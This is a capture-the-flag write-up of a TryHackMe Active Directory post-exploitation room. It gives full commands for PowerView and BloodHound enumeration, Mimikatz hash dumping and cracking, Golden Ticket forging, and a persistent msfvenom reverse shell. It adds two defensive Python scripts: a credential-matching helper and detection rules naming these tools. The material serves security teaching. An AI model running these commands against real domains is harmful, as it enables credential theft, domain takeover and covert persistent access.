POSTEXPLOIT
https://tryhackme.com/room/postexploit
Last updated
Username: Administrator
Password: P@$$W0rd
Domain Name: CONTROLLER
PowerView, a PowerShell script shipped with PowerShell Empire, is used to enumerate a domain after gaining a shell on the system. The following command copies the script out of Kali's Empire module library:
cp /usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network/powerview.ps1 .
The next step is to get this script onto the box. SSH can be used to log in with the given credentials, ssh Administrator@<IP>
, which shows the following screen:
The command powershell -ep bypass
bypasses the PowerShell execution policy, allowing scripts to be run.
The next step is getting PowerView onto the box. This can be done a number of ways; one is to serve it with a Python web server and fetch it with wget, i.e. python -m http.server
on the attacking machine and wget http://<myip>/powerview.ps1
on the target. You can also use scp
or a Samba share. For our convenience, the PowerView script was already in the Downloads folder. Load PowerView by importing the module with the following command:
import-module .\Downloads\PowerView.ps1
Quick way (dot-source the script into the current session): . .\Downloads\PowerView.ps1
Next, using some of the imported functions, we can enumerate the domain users, groups and computers:
get-netuser | select cn
get-netgroup -groupname *admin*
get-netcomputer -fulldata | select operatingsystem
Bloodhound is a graphical interface that allows a person to visually map out the network. It's useful for finding the shortest path to a domain admin or discovering kerberoastable users among many other things.
Install BloodHound with sudo apt install bloodhound
. neo4j must be running alongside BloodHound to display graphs; start it with sudo neo4j console
. The next step is putting the PowerShell or exe version of SharpHound (BloodHound's collector) on the target box and loading it as we did with the last tool, i.e. import-module .\Downloads\SharpHound.ps1
.
Start collecting information on the users, groups, trusts, etc. of the network by running the following command:
Invoke-BloodHound -CollectionMethod All -Domain CONTROLLER.local -ZipFilename loot.zip
Since we can SSH onto the Windows box, we can retrieve the file with scp:
scp Administrator@<targetip>:20220219133203_loot.zip .
Run BloodHound with the command bloodhound
and log in with the default neo4j credentials neo4j:neo4j
.
After logging in, drag and drop the downloaded zip file onto the Bloodhound application. Once fully imported, you can examine a large number of queries to further enumerate the domain network and users. One example is "Find Shortest Paths to Domain Admins":
Mimikatz is a post-exploitation tool mainly used for dumping user credentials inside an Active Directory network. The NTLM hashes it recovers can be cracked with tools like Hashcat, or used directly with evil-winrm to gain a shell without any other knowledge. Run Mimikatz with .\mimikatz.exe
Then run the following commands:
Ensure that Mimikatz is running as administrator: privilege::debug
Dump NTLM hashes for users: lsadump::lsa /patch
Get all password information for users: sekurlsa::logonpasswords full
Sample output of the lsadump
command:
Copy the lsadump output into lsadump.txt and run the command cat lsadump.txt | grep NTLM | cut -d' ' -f3 > hashes.txt
to place all the NTLM hashes in a single file for cracking. Run the following command to crack those hashes:
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt.gz
The cracked results can be matched back to the NTLM hashes to give a number of solved credentials:
Creds 1 > Machine1 : Password1
Creds 2 > Machine2 : Password2
Creds 3 > Administrator : P@$$W0rd
Creds 4 > SQLService : MYpassword123#
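The grep/cut pipeline above drops the usernames, so matching hashcat's results back to accounts is done by eye. The following script (an added example, not part of the room) parses the lsadump::lsa /patch output blocks, joins them with hashcat's `--show` output (which prints hash:plaintext) and also reports accounts that share one NT hash, i.e. share a password. The dump and the hashcat output below are constructed; the 32-hex-digit values are placeholders, not real NT hashes.

```python
"""
Added example (not from the TryHackMe room): match hashcat results back to
the accounts in a Mimikatz lsadump::lsa /patch dump, so a report can say
which account each cracked password belongs to instead of a bare hash list.
All sample data below is constructed for the example.
"""
import re
from collections import defaultdict

# Constructed lsadump::lsa /patch output in Mimikatz's layout:
# one block per account, each with RID / User / LM / NTLM lines.
# Hash values are made-up 32-hex-digit strings, not real NT hashes.
SAMPLE_LSADUMP = """\
Domain : CONTROLLER / S-1-5-21-0000000000-0000000000-000000000

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 11111111111111111111111111111111

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 22222222222222222222222222222222

RID  : 00000451 (1105)
User : Machine1
LM   :
NTLM : 33333333333333333333333333333333

RID  : 00000452 (1106)
User : Machine2
LM   :
NTLM : 33333333333333333333333333333333

RID  : 00000453 (1107)
User : Guest
LM   :
NTLM :
"""

# Constructed output of `hashcat -m 1000 hashes.txt <wordlist> --show`,
# which prints hash:plaintext, one cracked hash per line.
SAMPLE_HASHCAT_SHOW = """\
11111111111111111111111111111111:P@$$W0rd
33333333333333333333333333333333:Password1
"""

NTLM_RE = re.compile(r"^[0-9a-f]{32}$")


def parse_lsadump(text):
    """Return {username: ntlm_hash} for every account block that has a hash."""
    accounts = {}
    user = None
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key == "User":
            user = value
        elif key == "NTLM" and user is not None:
            if NTLM_RE.match(value.lower()):
                accounts[user] = value.lower()
            user = None  # block finished, with or without a usable hash
    return accounts


def parse_hashcat_show(text):
    """Return {ntlm_hash: plaintext} from hashcat --show output."""
    cracked = {}
    for line in text.splitlines():
        h, sep, plain = line.partition(":")
        if sep and NTLM_RE.match(h.strip().lower()):
            cracked[h.strip().lower()] = plain
    return cracked


def match_credentials(lsadump_text, hashcat_text):
    """Join the two: {username: plaintext} for every cracked account."""
    accounts = parse_lsadump(lsadump_text)
    cracked = parse_hashcat_show(hashcat_text)
    return {u: cracked[h] for u, h in accounts.items() if h in cracked}


def shared_hashes(lsadump_text):
    """Groups of accounts that share an NT hash (same password), each sorted."""
    by_hash = defaultdict(list)
    for user, h in parse_lsadump(lsadump_text).items():
        by_hash[h].append(user)
    return [sorted(users) for users in by_hash.values() if len(users) > 1]


if __name__ == "__main__":
    for user, pw in match_credentials(SAMPLE_LSADUMP, SAMPLE_HASHCAT_SHOW).items():
        print(f"{user} : {pw}")
    for group in shared_hashes(SAMPLE_LSADUMP):
        print("same password:", ", ".join(group))
```

The shared-hash report is the part worth keeping in a write-up: two accounts with one NT hash have the same password even when neither hash cracks. If the krbtgt account appears in such a dump at all, the domain's krbtgt password needs to be reset twice (the account keeps the previous password valid for a period), since its hash is exactly the ingredient the Golden Ticket section below uses.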
A Golden Ticket attack targets the KRBTGT account, the Active Directory Key Distribution Service account: with its hash, "Kerberos Ticket Granting Tickets" (TGTs) can be forged to access any resource on an Active Directory domain.
First, start Mimikatz and confirm it is running with debug privilege using privilege::debug
. Next, three things are needed to create a Golden Ticket: (1) the krbtgt username, (2) the full domain name and (3) the krbtgt NTLM hash. Get this information with the following command (its output also shows the domain SID used below):
mimikatz # lsadump::lsa /inject /name:krbtgt
Create the golden ticket using the found information with the following command:
mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
The ticket is created and saved to ticket.kirbi; it can also be used straight from the Mimikatz console to open a new command prompt carrying the forged ticket, with elevated privileges on all machines in the domain: misc::cmd
Server Manager gives an easy way to enumerate the domain using only built-in Windows features. The first step is creating an RDP connection to the server:
xfreerdp /u:Administrator /v:<targetip> /dynamic-resolution +clipboard
After logging in, open the "Server Manager" app by clicking the Windows start menu and typing it in.
Click on the [Tools] tab and then click on "Active Directory Users and Computers". This will put up a list of all users on the domain as well as other information such as groups and computers.
This section goes over setting up a Meterpreter shell and then using a Metasploit module to create a backdoor service on the system that will give an instant shell if the machine is ever shut down or reset.
First generate a payload with msfvenom. The following command will generate a basic windows meterpreter reverse tcp shell:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<myip> LPORT=<myport> -f exe -o shell.exe
Then transfer the payload to the target machine using scp:
scp shell.exe Administrator@<targetip>:"C:\Users\Administrator\Downloads\shell.exe"
Use metasploit's "exploit/multi/handler" to create a listener:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <myip>
set LPORT <myport>
run
Execute the generated payload on the target machine with .\shell.exe
and the listener should open a Meterpreter session:
Once a shell is caught, follow these steps to run the persistence module:
use exploit/windows/local/persistence
set session <id>
run
Now, whenever the session dies, rerunning the multi-handler should always get a shell thanks to the persistence service.
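Everything in this walkthrough (powershell -ep bypass, the PowerView cmdlets, Invoke-BloodHound, the Mimikatz modules, a shell.exe run out of Downloads) leaves a process-creation record on the host. The following script is an added example, not part of the room: a small rule set run over constructed records whose field names (Image, CommandLine, ParentImage, User) mirror Sysmon event 1 and Windows event 4688, showing what a detection over those fields catches and what it does not. The events, usernames and paths are all invented for the example.

```python
"""
Added example (not from the TryHackMe room): a detection pass over
process-creation records for the tooling used in this walkthrough.
The record layout mirrors Sysmon event 1 / Windows 4688 fields, but
every record below is constructed.
"""
import re
from typing import Dict, List, Tuple

# Constructed events. E0 and E6 are benign; the rest reproduce the
# walkthrough's steps as they would appear in a command-line field.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe",
     "ParentImage": r"C:\Windows\System32\OpenSSH\sshd.exe", "User": r"CONTROLLER\Administrator"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -ep bypass",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"CONTROLLER\Administrator"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -ep bypass -c ". .\Downloads\PowerView.ps1; get-netuser | select cn"',
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"CONTROLLER\Administrator"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -ep bypass -c "Import-Module .\Downloads\SharpHound.ps1; '
                    r'Invoke-BloodHound -CollectionMethod All -Domain CONTROLLER.local -ZipFilename loot.zip"',
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"CONTROLLER\Administrator"},
    {"Image": r"C:\Users\Administrator\Downloads\mimikatz.exe",
     "CommandLine": r'mimikatz.exe "privilege::debug" "lsadump::lsa /patch" "sekurlsa::logonpasswords full" exit',
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"CONTROLLER\Administrator"},
    {"Image": r"C:\Users\Administrator\Downloads\shell.exe", "CommandLine": r".\shell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"CONTROLLER\Administrator"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "User": r"NT AUTHORITY\SYSTEM"},
]

# (rule name, pattern matched against "CommandLine Image", severity).
# Patterns are the literal strings this walkthrough uses; a renamed
# binary or a different cmdlet alias will not match (see note below).
RULES: List[Tuple[str, "re.Pattern[str]", str]] = [
    ("PowerShell execution-policy bypass",
     re.compile(r"powershell(?:\.exe)?\b.*?-e[a-z]*\s+bypass\b", re.I), "medium"),
    ("PowerView enumeration cmdlet",
     re.compile(r"\b(?:get-netuser|get-netgroup|get-netcomputer"
                r"|get-domainuser|get-domaingroup|get-domaincomputer)\b", re.I), "medium"),
    ("SharpHound collection",
     re.compile(r"invoke-bloodhound|sharphound", re.I), "high"),
    ("Mimikatz module invocation",
     re.compile(r"privilege::debug|lsadump::|sekurlsa::logonpasswords|kerberos::golden", re.I), "critical"),
    ("Executable run from a Downloads folder",
     re.compile(r"\\users\\[^\\]+\\downloads\\[^\\\s\"]+\.exe\b", re.I), "low"),
]

SEVERITY_ORDER = {"low": 0, "medium": 1, "high": 2, "critical": 3}


def evaluate(event: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (rule name, severity) for every rule the event matches, in RULES order."""
    text = event.get("CommandLine", "") + " " + event.get("Image", "")
    return [(name, sev) for name, rx, sev in RULES if rx.search(text)]


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str, str, str]]:
    """Run all rules over all events; return (event index, user, rule, severity) tuples."""
    alerts = []
    for i, ev in enumerate(events):
        for name, sev in evaluate(ev):
            alerts.append((i, ev.get("User", "?"), name, sev))
    return alerts


def highest_severity(events: List[Dict[str, str]]) -> str:
    """Worst severity seen across the batch, or "none" when nothing matched."""
    return max((sev for *_, sev in scan(events)),
               key=SEVERITY_ORDER.__getitem__, default="none")


if __name__ == "__main__":
    for idx, user, rule, sev in scan(SAMPLE_EVENTS):
        print(f"event {idx} [{sev:8}] {user}: {rule}")
    print("highest severity:", highest_severity(SAMPLE_EVENTS))
```

Two things the output makes visible: the benign RemoteSigned script run does not trip the bypass rule, and a single Mimikatz invocation fires twice (module names plus the Downloads path), which is the kind of stacking a real alert pipeline should de-duplicate per process rather than per rule. The rules are string matches on what this room types; they are a starting point for a lab, not coverage of a renamed binary or an obfuscated command line.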
PowerView can be used to enumerate a vast number of things. An existing cheatsheet, a list of commands compiled by HackTricks, can be found [here](). Sample commands that can be used: